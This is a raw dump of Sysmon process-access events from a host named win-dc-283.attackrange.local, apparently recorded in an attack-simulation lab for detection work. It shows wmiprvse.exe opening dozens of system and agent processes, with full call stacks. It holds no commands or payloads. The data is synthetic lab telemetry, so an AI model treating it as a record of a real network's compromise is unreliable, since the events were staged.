16:01:21.909{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8A-6008-FF00-00000000A301}4808C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029032Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:21.909{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8A-6008-FC00-00000000A301}5008C:\Windows\System32\rdpclip.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029031Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:21.909{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A88-6008-F600-00000000A301}1548C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029030Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:21.894{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A88-6008-F300-00000000A301}4180C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029029Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:21.894{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A27-6008-E400-00000000A301}2860C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029028Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:21.894{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A22-6008-DB00-00000000A301}4244C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029027Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:21.894{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A1A-6008-B100-00000000A301}2640C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029026Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:21.894{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029025Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:21.894{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A11-6008-9600-00000000A301}4612C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029024Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:21.894{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49BC-6008-8200-00000000A301}4876C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029023Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:21.894{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49BC-6008-8100-00000000A301}4864C:\Windows\system32\WinrsHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029022Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:21.894{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4987-6008-1600-00000000A301}1536C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000029021Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:21.894{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49AF-6008-7F00-00000000A301}4328C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029020Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:21.894{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49AF-6008-7E00-00000000A301}4316C:\Windows\system32\WinrsHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029019Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:21.894{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-499C-6008-5500-00000000A301}3796C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029018Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:21.894{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-499B-6008-5100-00000000A301}3588C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029017Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:21.894{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3600-00000000A301}3468C:\Windows\System32\vds.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029016Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:21.894{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3400-00000000A301}3124C:\Windows\system32\wbem\unsecapp.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029015Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:21.894{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3300-00000000A301}2260C:\Windows\system32\DFSRs.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029014Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:21.894{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3200-00000000A301}2612C:\Windows\system32\dfssvc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029013Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 